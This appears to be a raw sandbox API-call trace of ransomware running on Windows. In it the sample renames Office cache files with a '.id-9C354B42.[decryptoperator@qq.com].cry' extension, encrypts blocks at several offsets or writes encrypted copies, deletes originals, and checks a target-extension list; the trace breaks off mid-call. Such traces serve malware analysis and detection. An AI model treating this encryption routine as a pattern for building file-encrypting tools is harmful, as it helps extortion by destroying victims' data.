1 [0047.718] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0047.718] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.718] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0047.718] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.718] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.718] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.719] ReadFile (in: hFile=0x214, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.739] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.739] ReadFile (in: hFile=0x214, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.763] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.763] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.763] ReadFile (in: hFile=0x214, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.857] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.857] WriteFile (in: hFile=0x214, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0047.873] SetEndOfFile (hFile=0x214) returned 1 [0047.873] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x43b0048 [0047.873] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.873] WriteFile (in: hFile=0x214, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.874] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.874] WriteFile (in: hFile=0x214, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.876] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.876] WriteFile (in: hFile=0x214, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.877] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x43b0048 | out: hHeap=0x600000) returned 1 [0047.877] CloseHandle (hObject=0x214) returned 1 [0047.878] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.878] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.878] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.878] lstrlenW (lpString=".doc") returned 4 [0047.878] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.878] lstrlenW (lpString=".docx") returned 5 [0047.878] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0047.878] lstrlenW (lpString=".pdf") returned 4 [0047.878] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.878] lstrlenW (lpString=".xls") returned 4 [0047.878] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.878] lstrlenW (lpString=".xlsx") returned 5 [0047.878] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0047.878] lstrlenW (lpString=".ppt") returned 4 [0047.878] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.878] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.878] lstrlenW (lpString=".zip") returned 4 [0047.878] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.878] lstrlenW (lpString=".rar") returned 4 [0047.878] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.878] lstrlenW (lpString=".bz2") returned 4 [0047.878] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.878] lstrlenW (lpString=".7z") returned 3 [0047.878] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.878] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.878] lstrlenW (lpString=".dbf") returned 4 [0047.878] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.879] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.879] lstrlenW (lpString=".1cd") returned 4 [0047.879] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.879] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.879] lstrlenW (lpString=".jpg") returned 4 [0047.879] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.879] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.879] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.879] lstrlenW (lpString=".doc") returned 4 [0047.879] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.879] lstrlenW (lpString=".docx") returned 5 [0047.879] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0047.879] lstrlenW (lpString=".pdf") returned 4 [0047.879] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.879] lstrlenW (lpString=".xls") returned 4 [0047.879] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.879] lstrlenW (lpString=".xlsx") returned 5 [0047.879] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0047.879] lstrlenW (lpString=".ppt") returned 4 [0047.879] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.879] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.879] lstrlenW (lpString=".zip") returned 4 [0047.879] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.879] lstrlenW (lpString=".rar") returned 4 [0047.879] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.879] lstrlenW (lpString=".bz2") returned 4 [0047.879] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.879] lstrlenW (lpString=".7z") returned 3 [0047.879] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.879] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.879] lstrlenW (lpString=".dbf") returned 4 [0047.879] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.879] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.879] lstrlenW (lpString=".1cd") returned 4 [0047.879] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.879] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0047.879] lstrlenW (lpString=".jpg") returned 4 [0047.879] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.880] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cry") returned 1 [0047.880] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0047.880] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.880] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=715834) returned 1 [0047.880] CloseHandle (hObject=0x214) returned 1 [0047.880] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0047.880] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.880] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.880] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.880] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.880] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0047.881] GetLastError () returned 0x0 [0047.881] ReadFile (in: hFile=0x214, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0048.063] WriteFile (in: hFile=0x164, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0048.081] ReadFile (in: hFile=0x214, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.081] WriteFile (in: hFile=0x164, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x104, lpOverlapped=0x0) returned 1 [0048.081] SetEndOfFile (hFile=0x164) returned 1 [0048.081] CloseHandle (hObject=0x164) returned 1 [0048.081] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.082] SetEndOfFile (hFile=0x214) returned 1 [0048.126] CloseHandle (hObject=0x214) returned 1 [0048.126] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.126] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0048.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.131] lstrlenW (lpString=".doc") returned 4 [0048.131] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0048.131] lstrlenW (lpString=".docx") returned 5 [0048.131] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0048.131] lstrlenW (lpString=".pdf") returned 4 [0048.131] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0048.131] lstrlenW (lpString=".xls") returned 4 [0048.131] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0048.131] lstrlenW (lpString=".xlsx") returned 5 [0048.131] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0048.132] lstrlenW (lpString=".ppt") returned 4 [0048.132] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0048.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.132] lstrlenW (lpString=".zip") returned 4 [0048.132] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0048.132] lstrlenW (lpString=".rar") returned 4 [0048.132] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0048.132] lstrlenW (lpString=".bz2") returned 4 [0048.132] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0048.132] lstrlenW (lpString=".7z") returned 3 [0048.132] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0048.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.132] lstrlenW (lpString=".dbf") returned 4 [0048.132] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0048.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.132] lstrlenW (lpString=".1cd") returned 4 [0048.132] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0048.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.132] lstrlenW (lpString=".jpg") returned 4 [0048.132] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0048.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.132] lstrlenW (lpString=".doc") returned 4 [0048.132] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0048.132] lstrlenW (lpString=".docx") returned 5 [0048.132] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0048.132] lstrlenW (lpString=".pdf") returned 4 [0048.132] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0048.133] lstrlenW (lpString=".xls") returned 4 [0048.133] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0048.133] lstrlenW (lpString=".xlsx") returned 5 [0048.133] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0048.133] lstrlenW (lpString=".ppt") returned 4 [0048.133] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0048.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.133] lstrlenW (lpString=".zip") returned 4 [0048.133] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0048.133] lstrlenW (lpString=".rar") returned 4 [0048.133] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0048.133] lstrlenW (lpString=".bz2") returned 4 [0048.133] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0048.133] lstrlenW (lpString=".7z") returned 3 [0048.133] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0048.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.133] lstrlenW (lpString=".dbf") returned 4 [0048.133] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0048.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.133] lstrlenW (lpString=".1cd") returned 4 [0048.133] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0048.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.133] lstrlenW (lpString=".jpg") returned 4 [0048.133] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0048.133] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0048.133] lstrlenW (lpString="ProPrWW2.cab") returned 12 [0048.133] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.134] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=222948913) returned 1 [0048.134] CloseHandle (hObject=0x214) returned 1 [0048.134] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab")) returned 0x2020 [0048.134] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.134] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0048.134] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.134] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.134] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.134] ReadFile (in: hFile=0x214, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.462] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.462] ReadFile (in: hFile=0x214, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.487] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.487] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.487] ReadFile (in: hFile=0x214, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.620] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.620] WriteFile (in: hFile=0x214, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0048.751] SetEndOfFile (hFile=0x214) returned 1 [0048.751] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x43b0048 [0048.751] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.751] WriteFile (in: hFile=0x214, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.789] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.789] WriteFile (in: hFile=0x214, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.793] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.794] WriteFile (in: hFile=0x214, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.807] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x43b0048 | out: hHeap=0x600000) returned 1 [0048.807] CloseHandle (hObject=0x214) returned 1 [0048.807] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.807] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.807] lstrlenW (lpString=".doc") returned 4 [0048.807] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.807] lstrlenW (lpString=".docx") returned 5 [0048.807] lstrcmpiW (lpString1=".docx", lpString2="2.cab") returned -1 [0048.807] lstrlenW (lpString=".pdf") returned 4 [0048.807] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.807] lstrlenW (lpString=".xls") returned 4 [0048.807] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.807] lstrlenW (lpString=".xlsx") returned 5 [0048.807] lstrcmpiW (lpString1=".xlsx", lpString2="2.cab") returned -1 [0048.807] lstrlenW (lpString=".ppt") returned 4 [0048.808] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.808] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 75 [0048.808] lstrlenW 